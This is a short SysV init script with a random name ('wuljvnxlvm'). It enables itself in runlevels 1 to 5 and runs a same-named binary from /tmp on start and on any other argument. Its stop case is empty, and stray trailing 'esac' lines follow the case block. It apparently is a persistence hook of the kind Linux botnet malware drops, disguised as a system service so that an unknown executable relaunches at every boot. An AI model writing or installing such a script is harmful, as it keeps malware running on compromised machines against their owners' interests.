#!/bin/sh
# chkconfig: 12345 90 90
# description: wuljvnxlvm
### BEGIN INIT INFO
# Provides:		wuljvnxlvm
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	wuljvnxlvm
### END INIT INFO
case $1 in
start)
	/tmp/wuljvnxlvm
	;;
stop)
	;;
*)
	/tmp/wuljvnxlvm
	;;
esac
;;
esac
